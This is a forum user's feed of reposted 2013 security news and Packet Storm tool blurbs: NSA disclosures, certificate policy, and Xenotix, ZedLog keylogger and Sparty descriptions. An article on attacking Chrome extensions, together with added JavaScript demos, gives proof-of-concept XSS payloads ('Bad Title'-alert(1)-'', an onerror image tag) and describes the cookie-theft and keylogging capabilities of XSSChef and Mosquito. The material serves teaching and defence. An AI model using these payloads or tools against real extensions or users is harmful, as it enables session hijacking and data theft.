Everything posted by Matt
-
Final release of Linux 3.11 is expected within a week, Torvalds said in a message echoing his 1991 post about the project It was 22 years ago on Sunday that Linus Torvalds announced in a newsgroup posting that he was creating a free operating system, a message he echoed in his announcement Sunday of the latest Linux kernel release candidate. "Hello everybody out there using minix - I'm doing a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones," Torvalds wrote on August 26, 1991, asking people to send in feature requests. On Sunday, Torvalds announced the Linux 3.11-rc7 kernel release in similar fashion. "Hello everybody out there using Linux -- I'm doing a (free) operating system (just a hobby, even if it's big and professional) for 486+ AT clones and just about anything else out there under the sun. This has been brewing since april 1991, and is still not ready. I'd like any feedback on things people like/dislike in Linux 3.11-rc7," he wrote on Google+. "I originally ported bash(1.08) and gcc(1.40), but others have taken over user space and things still seem to work. This implies that I'll get the final 3.11 release within a week, and I'd like to know what features most people would want. Any suggestions are welcome, but I won't promise I'll implement them," he added. Torvalds was also quick to add, in a comment on his post, that any feature requests would be a bit late. "Yeah, I don't really want to get feature requests this late in the rc series... But it is 22 years today since that email, and I would like people to try the current 3.11-rc7 kernel I just cut and uploaded to the usual places," he wrote. Version 3.11 of the Linux kernel has been given the codename Linux for Workgroups, a reference to Windows 3.11 for Workgroups, released by Microsoft a little over 20 years ago. One of the bigger changes from version 3.10 of the kernel is improved power management in AMD Radeon graphic chips.
Source ComputerWorld.Com
-
The project aims to solve hiccups in how security tools work with web browsers Mozilla is developing a protocol that aims to let security tools and Web browsers work better together. Configuring a web browser to work with a security tool involves writing platform and browser-specific extensions, a non-trivial process that discourages people with less experience, wrote Simon Bennetts, a security automation engineer with Mozilla, on Thursday. The proposed standard, called "Plug-n-Hack," will define how security extensions can work with a browser in a more usable way, Bennetts wrote. PnH will allow the security tool to "declare the functionality that they support which is suitable for invoking directly from the browser." Under the current arrangement, if a user wants to, for example, intercept HTTPS traffic, a user must configure proxy connections through the tool and browser correctly and import the tool's SSL (Secure Sockets Layer) certificate, Bennetts wrote. "If any of these steps are carried out incorrectly then the browser will typically fail to connect to any website -- debugging such problems can be frustrating and time-consuming," Bennetts wrote. Users may also have to switch often between the tool and their browser to intercept an HTTPS request. "PnH allows security tools to declare the functionality that they support which is suitable for invoking directly from the browser," Bennetts wrote. "A browser that supports PnH can then allow the user to invoke such functionality without having to switch to and from the tool." The PnH protocol is being designed to be browser and tool independent. The implementation for Firefox has been released under the Mozilla Public License 2.0 and can be incorporated into commercial products for free, Bennetts wrote. The next phase of the project is being planned, but it is expected it will allow browsers to "advertise their capabilities to security tools," he wrote.
"This will allow the tools to obtain information directly from the browser, and even use the browser as an extension of the tool," Bennetts wrote. Source ComputerWorld.Com
-
Starting in early 2014 Google Chrome will block certificates issued after July 1, 2012, with a validity period of more than 60 months Mozilla is considering the possibility of rejecting as invalid SSL certificates issued after July 1, 2012, with a validity period of more than 60 months. Google already made the decision to block such certificates in Chrome starting early next year. "As a result of further analysis of available, publicly discoverable certificates, as well as the vibrant discussion among the CA/B Forum [Certificate Authority/Browser Forum] membership, we have decided to implement further programmatic checks in Google Chrome and the Chromium Browser in order to ensure Baseline Requirements compliance," Ryan Sleevi, a member of the Google Chrome Team said Monday in a message to the CA/B Forum mailing list. The checks will be added to the development and beta releases of Google Chrome at the beginning of 2014. The changes are expected in the stable release of Chrome during the first quarter of next year, Sleevi said. The Baseline Requirements for the Issuance and Management of Publicly-Trusted Certificates, sometimes simply referred to as the Baseline Requirements, is a set of guidelines agreed upon by all certificate authorities (CAs) and browser vendors that are members of the CA/B Forum. Version 1.0 of the Baseline Requirements went into effect on July 1, 2012, and states that "Certificates issued after the Effective Date MUST have a Validity Period no greater than 60 months." It also says that certificates to be issued after April 1, 2015, will need to have a validity period no greater than 39 months, but there are some clearly defined exceptions to this requirement. The shortening of certificate validity period is a proactive measure that would allow for a timely implementation of changes made to the requirements in the future. 
It would be hard for future requirements, especially those with a security impact, to have a practical effect if older certificates that aren't compliant with them would remain valid for 10 more years. Google identified 2,038 certificates that were issued after July 1, 2012, and have validity periods longer than 60 months, in violation of the current Baseline Requirements. "We encourage CAs that have engaged in this unfortunate practice, which appears to be a very limited subset of CAs, to reach out to affected customers and inform them of the upcoming changes," Sleevi said referring to the fact that Chrome will start blocking those certificates in the beginning of 2014. On Thursday, a discussion was started on the Mozilla bug tracker on whether the company should enforce a similar block in its products. "Everyone agrees such certs, when newly issued, are incompatible with the Baseline Requirements," said Gervase Markham, who deals with issues of project governance at Mozilla, on the bug tracker. "Some CAs have argued that when reissued, this is not so, but Google does not agree with them. We should consider making the same change." Source ComputerWorld.Com
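As an added illustration, not part of the article and not Chrome's or Mozilla's code, the following JavaScript applies the two Baseline Requirements validity limits quoted above to a constructed certificate inventory: certificates issued on or after 1 July 2012 may not exceed 60 months, and those issued on or after 1 April 2015 may not exceed 39 months. The certificate records, the whole-calendar-month counting rule and the function names are assumptions made for the example; the exceptions the BR allows for the 39-month rule are not modelled.

```javascript
'use strict';
// Added example: validity-period check modelled on the Baseline Requirements
// text quoted in the article. The certificate records below are constructed.

// Rules are ordered newest first; the first rule whose effective date the
// certificate's notBefore has reached is the one that applies.
const VALIDITY_LIMITS = [
  { effective: Date.UTC(2015, 3, 1), maxMonths: 39 }, // 1 April 2015
  { effective: Date.UTC(2012, 6, 1), maxMonths: 60 }, // 1 July 2012, BR v1.0 effective date
];

// Whole calendar months between two UTC dates (assumed interpretation of a
// "Validity Period" expressed in months; a partial trailing month is not counted).
function monthsBetween(from, to) {
  let months = (to.getUTCFullYear() - from.getUTCFullYear()) * 12
             + (to.getUTCMonth() - from.getUTCMonth());
  if (to.getUTCDate() < from.getUTCDate()) months -= 1;
  return months;
}

function checkValidityPeriod(cert) {
  const notBefore = new Date(cert.notBefore);
  const notAfter = new Date(cert.notAfter);
  const months = monthsBetween(notBefore, notAfter);
  const rule = VALIDITY_LIMITS.find(r => notBefore.getTime() >= r.effective);
  if (!rule) {
    // Issued before BR v1.0 took effect: the 60-month rule does not apply.
    return { subject: cert.subject, months, compliant: true,
             reason: 'issued before BR v1.0 took effect' };
  }
  const compliant = months <= rule.maxMonths;
  return { subject: cert.subject, months, compliant,
           reason: (compliant ? 'within ' : 'exceeds ') + rule.maxMonths + '-month limit' };
}

// Constructed sample inventory (hypothetical subjects and dates).
const SAMPLE_CERTS = [
  { subject: 'www.example-a.test', notBefore: '2013-01-01T00:00:00Z', notAfter: '2019-01-01T00:00:00Z' },
  { subject: 'www.example-b.test', notBefore: '2013-01-01T00:00:00Z', notAfter: '2016-01-01T00:00:00Z' },
  { subject: 'www.example-c.test', notBefore: '2012-06-30T00:00:00Z', notAfter: '2022-06-30T00:00:00Z' },
  { subject: 'www.example-d.test', notBefore: '2015-05-01T00:00:00Z', notAfter: '2019-05-01T00:00:00Z' },
];

// Returns only the certificates a BR-enforcing client would reject.
function findNonCompliant(certs) {
  return certs.map(checkValidityPeriod).filter(r => !r.compliant);
}

console.log(findNonCompliant(SAMPLE_CERTS));
```

Run against a real inventory, the notBefore/notAfter pairs would come from the parsed certificates; the point of keeping the rules as a dated table is that the 39-month limit for 2015 can be enforced by the same code without touching the check itself.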
-
Tech firms' responses to new NSA disclosures cloud the truth
The NSA paid millions to compensate companies' surveillance costs, new documents claim Technology companies may be hiding behind legal jargon to avoid being more forthcoming in their responses to new documents on government surveillance that were disclosed Friday, some experts say. Internet and software companies including Microsoft, Yahoo, Google and Facebook "are legally compelled to lie," said security expert Bruce Schneier, citing national security letters that companies are prohibited from disclosing. Some similar statements were made in interviews with the IDG News Service following a report published Friday in The Guardian alleging that the National Security Agency paid millions of dollars to companies such as Google and Facebook to cover costs involved in surveillance. The tech companies incurred these costs in fulfilling tighter certification requirements after a 2011 court ruling said the government's data collection was unconstitutional, according to documents obtained by The Guardian. That ruling, which was handed down by the Foreign Intelligence Surveillance Court and was made public on Wednesday, said that the way the NSA collected data violated the Fourth Amendment because the agency did not effectively design its collection efforts to target only foreigners of interest to national security. The NSA was "misusing its authority" by collecting the digital communications of U.S. citizens for years, the ruling said. The documents revealed Friday describe the problems that the agency experienced after that ruling and the resulting efforts required to bring companies into compliance, according to The Guardian. The list of involved companies includes Google, Yahoo, Microsoft and Facebook, its report said. The documents were passed on to The Guardian by former NSA contractor Edward Snowden, the man behind the original leaks of various government surveillance programs such as Prism. 
The documents provide the first evidence of a financial relationship between technology companies and the NSA, the Guardian report said. The FISA court is required to sign annual certifications that provide the legal framework for surveillance operations, the report said. After the 2011 ruling, those certifications were only being renewed on a temporary basis as the NSA worked to fix its data collection methods that the court deemed unconstitutional. This adjustment process entailed huge costs, according to a 2012 NSA newsletter entry, excerpts of which were published by The Guardian. "Last year's problems resulted in multiple extensions to the certifications' expiration dates which cost millions of dollars for Prism providers to implement each successive extension," the newsletter said. The Guardian did not give an exact figure for the costs. The latest disclosure raises serious questions around the use of taxpayer money to finance government surveillance, the Guardian said. But another issue is the growing discrepancy between the information contained in leaked government documents and technology companies' responses to it. Source ComputerWorld.Com
-
Hackers could find themselves in the catbird seat on April 8, 2014 -- the day Microsoft plans to stop patching Windows XP. As security expert Jason Fossen sees it, those who have zero-day exploits for XP will bank them until that day and then sell them to crooks or loose them themselves on unprotected PCs. It's simply economics at work, said Fossen, a trainer for the SANS Institute since 1998. "The average price on the black market for a Windows XP exploit is $50,000 to $150,000, a relatively low price that reflects Microsoft's response," said Fossen. When a new vulnerability -- dubbed a "zero-day" -- is detected, Microsoft investigates, pulls together a patch and releases it to XP users. But the price will go up when Microsoft stops patching its aged operating system. Fossen acknowledged that there really aren't any precedents to back up his speculation, because the last time Microsoft retired an operating system was in July 2010, when it pulled the plug on Windows 2000, which wasn't nearly as widely used as XP is. Computerworld has projected that Windows XP will still run 33% to 34% of the world's PCs at the end of April 2014. HD Moore, creator of the popular Metasploit penetration testing toolkit and chief security officer at security company Rapid7, agreed that XP hacks would become more valuable after the operating system's retirement in April 2014, but he contended that all Windows vulnerabilities would jump in value at that time. Source ComputerWorld.Com
-
Reports suggest that the news about the NSA's secret data-collection program is causing foreign users to look elsewhere for cloud-based services. Edward Snowden's revelations about the National Security Agency's Prism surveillance program could cause U.S. providers of cloud-based services to lose 10% to 20% of the foreign market -- a slice of business valued at up to $35 billion. A new report from the Information Technology & Innovation Foundation (ITIF) concludes that European cloud computing companies, in particular, might successfully exploit users' fears about the secret data collection program to challenge U.S. leadership in the hosted services business. Daniel Castro, author of the report, acknowledges that the conclusions are based, so far, on thin data, but nonetheless argues that the risks to U.S. cloud vendors are real. Indeed, a month prior, the Cloud Security Alliance reported that in a survey of 207 officials of non-U.S. companies, 10% of the respondents said that they had canceled contracts with U.S. service providers after Snowden's leak of NSA Prism documents earlier this year. "If U.S. companies lose market share in the short term, it will have long-term implications on their competitive advantage in this new industry," said Castro in the ITIF report. "Rival countries have noted this opportunity and will try to exploit it." To counter such efforts, the U.S. must challenge overstated claims about the program by foreign companies and governments, said Jason Weinstein, a partner in the Washington office of law firm Steptoe & Johnson and a former federal prosecutor and deputy assistant attorney general specializing in computer crime. "There are a lot of reasons to be concerned about just how significant those consequences will be," Weinstein said. "The effort by European governments and European cloud providers to cloud the truth about data protection in the U.S. was going on well before anyone knew who Edward Snowden was. 
It just picked up new momentum once the Prism disclosures came out." Weinstein contends that European countries have fewer data protection rules than the U.S. For example, he said that in the U.K. and France, a wiretap to get content can be issued by a government official without court authority, but that can't happen in the U.S. "U.S. providers have done nothing other than comply with their legal obligations," he said. But because of Snowden's leaks, "they are facing potentially significant economic consequences." Gartner analyst Ed Anderson said his firm has yet to see any revenue impact on cloud providers since the Prism disclosures, but added, "I don't think Prism does U.S. providers any favors, that's for sure." Nonetheless, Anderson added, "I think the reality is [the controversy] is likely to die down over time, and we expect adoption to probably continue on the path that it has been on." One reason why U.S. providers may not suffer is because "the alternatives aren't great if you are a European company looking for a cloud service," he said. Like Weinstein, Anderson said European governments also access private online data. "If you think that Prism is the only program in the world where a government is inspecting private data, you are pretty naive," he said. Nonetheless, Anderson did warn that continued "missteps on the part of the U.S. government" could have a long-term impact on the worldwide perception of the U.S. cloud computing business. Source ComputerWorld.Com
-
China's Internet was hit with a major distributed denial of service (DDoS) attack Sunday morning that briefly disrupted and slowed access to sites in the .cn domain. The DDoS attack was the largest in history against the domain servers for China's .cn ccTLD (country code top level domain), according to the China Internet Network Information Center (CNNIC), which administers the domain. The first attack started Sunday around midnight Beijing time, and was then succeeded by a larger attack at 4 a.m., the CNNIC said in an Internet posting. A number of sites were affected, but Internet service to the sites had been gradually restored by 10 a.m. Sunday. It's unclear where the attack originated from or if it was still continuing. A CNNIC spokeswoman said on Monday it would update the public once more information was gathered. Chinese regulators have already launched unspecified measures to protect the domain system, while CNNIC has apologized for the disruption. China has often been accused of launching DDoS attacks. In this year's first quarter, it was the top source country for DDoS attacks, according to security vendor Prolexic. The U.S. was ranked second. DDoS attacks commonly work by deploying armies of hacked computers to send traffic to a website, saturating it with data so that it becomes inaccessible to normal users. China, however, has said it's facing a surge of Trojan and botnet attacks against the country. Many of those attacks are coming from the U.S., South Korea and Germany. China has also denied the country sponsors hacking, despite claims brought by U.S. officials and security vendor Mandiant that its government actively conducts cyber-espionage. Source Computerworld.Com
-
The agency reportedly cracked the system's encryption to snoop on internal UN communications The U.S. National Security Agency reportedly cracked the encryption used by the video teleconferencing system at the United Nations headquarters in New York City. In June 2012 the NSA department responsible for collecting intelligence about the U.N. gained "new access to internal United Nations communication," German magazine Der Spiegel reported Monday based on information from secret NSA documents provided by former NSA contractor Edward Snowden. The NSA technicians were able to crack the encryption used by the U.N.'s internal video teleconferencing (VTC) system allowing VTC traffic to be decrypted. "This traffic is getting us internal UN VTCs (yay!)," one of the internal NSA documents said, according to Der Spiegel. In less than three weeks, the number of U.N. communications that the NSA managed to intercept and decrypt rose from 12 to over 450. According to another NSA internal report from 2011, the agency caught the Chinese spying on the U.N. and managed to tap into their signals intelligence (SIGINT) collection to gain insight into high interest and high profile events at the time. Media reports in June based on documents leaked by Snowden claimed that the European Union mission to the U.N. in New York and its delegation in Washington, D.C. have also been bugged by the NSA, prompting E.U. officials to demand answers from the U.S. government. The NSA was able to maintain persistent access to computer networks at E.U. delegations in New York and Washington by taking advantage of the Virtual Private Network (VPN) linking them, Der Spiegel also reported Monday. "If we lose access to one site, we can immediately regain it by riding the VPN to the other side and punching a whole [sic] out," an internal NSA presentation said, according to the German magazine. "We have done this several times when we got locked out of Magothy." 
"Magothy" is the internal code name used by the NSA for the E.U. delegation in Washington, D.C. The code name used for the E.U. mission in New York is "Apalachee." New security systems were installed to protect the restricted area hosting the server room at the offices of the E.U. delegation to the U.N. in New York a few weeks ago, following the June reports about the NSA targeting the E.U.'s diplomatic missions in the U.S., Der Spiegel said. An investigation was launched and technicians have searched for bugs and checked the computer network. Source ComputerWorld.Com
-
Traffic management firm Gigamon has unveiled an update for its GigaVue service that offers IT teams the ability to gain insights on the different traffic demands from different areas of the business. The GigaVue 3.1 update will include a Visibility as a Service (VaaS) add-on within the Flow Mapping process to enable administrators to supply data on the traffic within departments. This could be used by teams such as marketing to analyse visitor traffic, or security teams looking at event monitoring after an incident. Gigamon chief strategy officer Shehzad Merchant said that providing this kind of system will help enterprises benefit from the cloud internally to gain greater insights into their data. "The notion of multi-tenancy has made its way from the public cloud space into enterprise IT infrastructure as well," he said. "This solution enables network administrators and services teams to virtualise the Visibility Fabric and offer Visibility as a Service to the different IT departments." The firm said that this capability will enable organisations to alter management policies on a per-team and per-department basis as needs require, while maintaining the compliance and privacy controls they have in place across the enterprise. These tenants, who include various IT operations teams, will have the power to dynamically change monitoring and traffic visibility policies on a per-organisation or per-tenant basis without impacting other departmental monitoring policies, while maintaining compliance and privacy. The GigaVue 3.1 update also includes a host of other updates such as role-based access control capabilities and improved workflow displays for monitoring of policy configurations. The update will be launched on 30 September for no additional cost for existing customers of the GigaVue tool. Source V3.CO.UK
-
1. Introduction
We are living in an age defined by SPEED. We always look for shortcuts, faster ways and faster solutions in order to save time. Supposing most people use browser extensions because they are too lazy to download and install software with the same functions as the extension, because they want to save some time, or because they just discovered a faster way to explore lots of features in a short time, I will continue with a talk about the danger behind browser extensions.

2. What are these extensions?
First of all, Chrome extensions are NOT browser plugins; they are browser add-ons, HTML5 applications that enrich the browser's user experience. By installing these extensions, you give your browser additional functionality (mail notification, ad blocking, online bookmarking, developer tools, page recommendation, notebooks, and so on).

3. Why are they so interesting as a subject of research?
Google Chrome extensions are basically HTML applications, so they suffer from the same vulnerabilities as ordinary websites, but the difference between extensions and websites is that an extension requires higher-level access privileges. For example, in theory, extensions can read and write all cookies, so they are a good starting point for a session hijacking attack. They can even change your proxy settings, block requests that your browser is trying to send over HTTP or HTTPS, take screenshots of websites, and so on. Knowing this, and knowing why extensions are so popular, we should take a closer look and try to avoid the bad things extensions can bring.

4. How are they built?
Basically they are a bunch of files (HTML + JS + CSS), zipped and signed with a developer key (just like a usual mobile application) and packaged into a CRX file.

5. How can we install these things?
We can install extensions from the Chrome Web Store, from some third-party websites, or manually by dragging the extension's CRX file onto the Chrome extensions page and choosing the install option.

6. Extension Components
Extensions have a few distinct components:
- Manifest File - similar to most mobile applications, this file lists all the components embedded in the application and the permissions it defines. The manifest is a simple JSON file containing the name of the extension, a description, the permissions and, as one of the more important sections, "content_scripts".
Example of Manifest File
- matches - a list of URL patterns which define on which websites the extension's content script is going to run. As long as the URL matches the settings in the extension, the browser will load the content script.
- Content Scripts - in the presented example we have jquery-1.8.1 and content.js as content scripts.
- View Pages - this component is related to the user interface. Extensions can have a little button on the top right of the browser interface, and can also have an options page, usually loaded as a pop-up, where we are able to adjust the extension's functionality. To make things more complicated, extensions have background pages that run constantly in hidden mode and live inside the browser session. So as long as you can execute code in that domain, the background page is persistent.
- NPAPI Plugins (optional) - some extensions also bundle NPAPI plugins, which are simply binary code compiled for the architecture of the browser. Code running in an NPAPI plugin has the full permissions of the current user and is not sandboxed or shielded from malicious input, so we must double-check the source of extensions that use NPAPI before installing and using them.

7. Security - How secure are the extensions we use?
First let's take a look at how all these components talk to each other.
The first part, the Content Script, runs in the context (origin) of the web page that is being displayed, so of course it can access the actual DOM elements. It can modify the DOM to enrich the website (for example, to capture all the images or to insert additional toolbars, and so on). It uses standard JavaScript DOM access such as the innerHTML property, document.cookie or document.title. So this is a way of exchanging information between the website and the parts of the extension beyond the content script. BUT at the same time, the content script cannot store information directly in the JavaScript already running on the page. Also it cannot call the page's functions and cannot be called from the original website, so there is a security boundary here. The Content Script also has access to the part of the extension that is able to submit AJAX requests, which is much more powerful because it is cross-domain, so it can get the response back.
View Pages can communicate with the Content Script, and vice versa, only by sending messages and receiving responses (similar to the HTML5 postMessage API). No direct function calls, no DOM access, just exchanging messages. BUT View Pages and the background page can instantiate new content scripts, which is a form of evil because you can directly pass the code as a string parameter and it will get evaluated as a content script in the context of the web page that is being viewed. View and Background Pages are the only components of a Google Chrome extension which have access to this powerful extension API, and they represent the hard stuff of an extension because, using this API, the extension can change proxy settings, monitor requests, access cookies in open tabs, take screenshots of open websites and access the data that you pasted into your clipboard. Also the background pages by default can call NPAPI plugins.

8. Permissions listed upon installation
Similar to what mobile applications on most platforms do, extensions have Permissions which are displayed to the user and require the user's agreement.

9. Attacking Extensions
So, extensions are HTML applications and there are a lot of them. We also know that one of the most dangerous HTML vulnerabilities is XSS. View page DOM XSS was a really, really bad thing last year, and after some research I discovered a lot of extensions vulnerable to DOM XSS. Basically, when you design web applications, no matter if they are Chrome extensions or websites, it is easier to write vulnerable code than safe code.

10. How does a typical XSS take place?
In this article I will focus on vectors employing a malicious website. The model is: users have a vulnerable extension installed and visit a malicious website which tries to exploit the extension. Here's a small example. Suppose we have a payload in a web page's DOM, let's say in the page title, and the user has a bookmarking extension installed. The extension attaches its user interface as a button on the website, and the user clicks it. Of course the content script fetches the payload from the DOM into its own variable, and then the extension forwards it to the View page by sending a message with the title of the page the user wants to bookmark. Then the View Page does its logic and decides to display the title of the website back. So we will have a malicious web page bookmarked, a classic DOM XSS vulnerability:

<title>Bad Title'-alert(1)-'</title>
=> a = document.title; chrome.extension.sendRequest({ do: "bookmark", url: document.location, title: a }, ...)
=> $('#bookmarklist').append('<li>' + title + '</li>');

This is not a DOM XSS just in a website; it is an XSS in a view page of an extension, so it will get access to all the APIs that the extension was permitted to access. The XSS can be really simple, running in the background and just accessing the evil function and executing it.

11. NPAPI binary code vulns
These are far scarier but not that common; it's when you have an NPAPI plugin with binary code vulnerabilities inside. Usually it looks like this: malicious payload in the DOM > gets transferred to the content script > then transferred to the view page, and then the view page accesses the method that is exported by the NPAPI plugin. NPAPI plugins are simply binary code, so as long as they have some binary vulnerabilities like command injection, buffer overflows or format string vulnerabilities, we can exploit them from the web page. The interesting thing is that the code executed in the NPAPI plugin runs with the user's permissions.

12. Tools for exploiting Chrome extensions
- BeEF - Fake Flash Update Module - basically a very good tool to exploit XSS.
- XSSChef - Chrome extension Exploitation Framework. What can you actually do (when having the appropriate permissions)? Monitor open tabs of victims; execute JS on every tab (global XSS); extract HTML, read/write cookies (also httpOnly) and localStorage; get and manipulate browser history; stay persistent until the whole browser is closed (or even further if you can persist in the extension's localStorage); take screenshots of the victim's window; further exploit, e.g. via attaching BeEF hooks, keyloggers etc.; explore the filesystem through the file:// protocol; bypass the Chrome extensions content script sandbox to interact directly with page JS.
- Mosquito - Chrome Extension exploitation tool. Mosquito is a Google Chrome extension exploitation tool allowing an attacker to leverage XSS found in an extension content script to issue arbitrary cross-domain HTTP requests with the victim's browser (and the victim's cookies). With this tool attackers can exploit content-script XSS vulnerabilities in extensions based on manifest v1 and v2. Mosquito also requires:
- MalaRIA (JDK to compile)
- websockify (Python and some libs to run it)
- a confirmed content-script XSS vulnerability in a Google Chrome extension

CONCLUSION: Extensions are vulnerable as well, and exploiting them gives more power, so double-check that the extension you need will not pwn you!

References:
1. Developer chrome - extensions
2. Developer chrome - tutorials
3. Advanced Chrome extension exploitation - whitepaper
Tools:
1. BeEF - fake flash update module
2. XSSChef - Chrome extension exploitation framework
3. Mosquito - Chrome extension exploitation tool
Source Resources.InfoSecInstitute.COM
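The manifest "matches" section (section 6) and the content-script-to-view-page bookmark flow (section 10) can be exercised outside a browser. The following JavaScript is an added example, not code from the article or from any real extension: it carries a constructed manifest for a hypothetical bookmarking extension, a checker that decides on which URLs its content script would be loaded (Chrome "matches" entries are match patterns, <scheme>://<host><path>, and the conversion to a RegExp below is this example's own), and a simulated message from the content script to the view page whose title is rendered the vulnerable way from the article and then with escaping. The page object, the payload and all function names are assumptions; the payload is an HTML-context one, since the sink is HTML built by concatenation.

```javascript
'use strict';
// Added example (not from the article). Constructed manifest (v2) for a
// hypothetical bookmarking extension, with the content_scripts/matches
// section the article describes.
const manifest = {
  manifest_version: 2,
  name: 'Example Bookmarker',
  permissions: ['tabs', 'cookies'],
  content_scripts: [
    { matches: ['*://*.example.com/*', 'https://news.example.org/*'],
      js: ['jquery-1.8.1.js', 'content.js'] },
  ],
};

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Chrome "matches" entries are match patterns, not regular expressions:
// "*" as scheme means http or https, "*." on the host means any subdomain
// (or none), and "*" in the path is a wildcard. This converter is the
// example's own approximation of the common forms.
function matchPatternToRegExp(pattern) {
  if (pattern === '<all_urls>') return /^(?:https?|ftp|file):\/\/.*$/;
  const m = /^(\*|https?|ftp|file):\/\/(\*|\*\.[^\/*]+|[^\/*]+)?(\/.*)$/.exec(pattern);
  if (!m) throw new Error('invalid match pattern: ' + pattern);
  const scheme = m[1] === '*' ? 'https?' : m[1];
  let host = '';
  if (m[2] === '*') host = '[^/]+';
  else if (m[2] && m[2].startsWith('*.')) host = '(?:[^/]+\\.)?' + escapeRegExp(m[2].slice(2));
  else if (m[2]) host = escapeRegExp(m[2]);
  const path = escapeRegExp(m[3]).replace(/\\\*/g, '.*');
  return new RegExp('^' + scheme + '://' + host + path + '$');
}

// True when some content_scripts entry would be injected into this URL.
function contentScriptRunsOn(url) {
  return manifest.content_scripts.some(cs =>
    cs.matches.some(p => matchPatternToRegExp(p).test(url)));
}

// Content-script side: it reads the page DOM, so an attacker-controlled page
// controls everything it reads. A real extension would hand this object to
// chrome.extension.sendRequest / chrome.runtime.sendMessage.
function buildBookmarkMessage(doc) {
  return { do: 'bookmark', url: doc.location, title: doc.title };
}

// View-page side as in the article: HTML built by string concatenation,
// so markup in the title is interpreted by the extension's own page.
function renderBookmarkVulnerable(msg) {
  return '<li>' + msg.title + '</li>';
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g,
    c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Hardened view page: escape before concatenating. In a real page, creating
// the <li> element and assigning textContent avoids building HTML at all.
function renderBookmarkSafe(msg) {
  return '<li>' + escapeHtml(msg.title) + '</li>';
}

// Constructed malicious page: the title carries an HTML-context payload.
const maliciousPage = {
  location: 'https://www.example.com/article',
  title: 'Bad Title<img src=x onerror=alert(1)>',
};

function demo() {
  const msg = buildBookmarkMessage(maliciousPage);
  return {
    contentScriptRuns: contentScriptRunsOn(maliciousPage.location),
    vulnerable: renderBookmarkVulnerable(msg),
    safe: renderBookmarkSafe(msg),
  };
}

console.log(demo());
```

The match check shows why the "matches" list is part of the attack surface: every origin it covers is one the attacker can host the payload on. The two render functions show the only difference between the vulnerable and the fixed view page, and because the view page holds the extension's API permissions, the unescaped variant is the one the article's "XSS in a view page" refers to.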
-
The US National Security Agency (NSA) regularly collected information at the European Union (EU) missions in New York and Washington, managed to gain access to the UN's internal video conferences and regards the Vienna headquarters of the International Atomic Energy Agency (IAEA) as one of its key espionage targets, according to a new batch of revelations from former CIA contractor Edward Snowden, the weekly Der Spiegel reported on Sunday, as cited by Itar-Tass. In April of this year, NSA employees drew up a table of priorities, from the highest (grade 1) to the lowest (grade 5), and assigned them to certain states and international institutions. Russia, along with Iran, North Korea and China, was ranked as a grade 1 priority, and the EU as grade 3, according to the documents disclosed by Snowden. In the case of the EU, the NSA was interested first of all in financial stability, trade relations and foreign policy. Foreign-policy information from the UN was ranked as a grade 2 priority. According to Der Spiegel, the NSA has its own staff at the UN who work there as diplomats. In addition, in 2012 NSA technology specialists managed to gain access to the organization's network, a fact they commented on enthusiastically in one of their reports: "The data flow gives us access to the UN's internal conferences, hurray". To obtain information about the EU, the NSA planted microphones at the EU mission to the UN headquarters in New York, as well as at the organization's mission in Washington, Spiegel reports. At the same time, the NSA managed to connect to the internal computer network of the UN mission in the US capital and gain access to its digital storage media, as attested by secret documents dating from September 2010.
Information from the headquarters of the International Atomic Energy Agency (IAEA) in the Austrian capital also enjoys top priority. Information on arms control is marked grade 1. Der Spiegel also reports on the secret programs Blarney and Rampart-T. The first dates from 1978 and covers targets such as "diplomatic leadership, counter-terrorism, foreign governments and the economy". Information from this program lands daily on the desk of US President Barack Obama, the German publication emphasizes. The second program dates from 1991 and targets "top leaderships and people close to them". According to Der Spiegel, Rampart-T's targets are 20 states, including Russia and China. Source Business24.RO
-
Description : OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides zero-false-positive scan results with its unique triple browser engine (Trident, WebKit and Gecko) embedded scanner. It is claimed to have the world's 2nd largest collection of XSS payloads, about 1500+ distinctive XSS payloads for effective XSS vulnerability detection and WAF bypass. It incorporates a feature-rich information gathering module for target reconnaissance. The exploit framework includes highly offensive XSS exploitation modules for penetration testing and proof-of-concept creation.
Author : Ajin Abraham
Source : OWASP Xenotix XSS Exploit Framework 4 ≈ Packet Storm
Download : HERE
-
Description : ZedLog is a robust cross-platform input logging tool (or key logger). It is based on a flexible data logging system which makes it easy to get the required data. It captures all keyboard and mouse events, has a full GUI, and supports logging to a file and basic hiding.
Author : Zachary Scott
Source : ZedLog 0.2 Beta 4 ≈ Packet Storm
Download : HERE
-
Description : Sparty is an open source tool written in Python to audit web applications using the SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint and FrontPage based web applications. Due to the complex nature of this web administration software, a simple and efficient tool is needed that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.
Author : sparty.secniche.org
Source : Sparty 0.1 ≈ Packet Storm
Download : HERE
-
Description : netsniff-ng is a free, performant Linux network sniffer for packet inspection. The performance gain comes from 'zero-copy' mechanisms, so that the kernel does not need to copy packets from kernel space to user space. For this purpose netsniff-ng is libpcap independent, but nevertheless supports the pcap file format for capturing, replaying and performing offline analysis of pcap dumps. netsniff-ng can be used for protocol analysis, reverse engineering and network debugging.
Author : Tobias Klauser, Daniel Borkmann
Source : Netsniff-NG High Performance Sniffer 0.5.8 ≈ Packet Storm
Download : HERE
-
Description : PayPal suffers from an arbitrary account deletion vulnerability that leverages unvalidated email account additions.
Author : Cernica Ionut / mah_one
Source : Paypal Account Deletion ≈ Packet Storm
Code :

Title:
======
PayPal Bug Bounty #110 - Auth Bypass (Session) Vulnerability

Date:
=====
2013-08-21

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1056

PayPal Security UID: oebaLK

VL-ID:
=====
1056

Common Vulnerability Scoring System:
====================================
9.1

Introduction:
=============
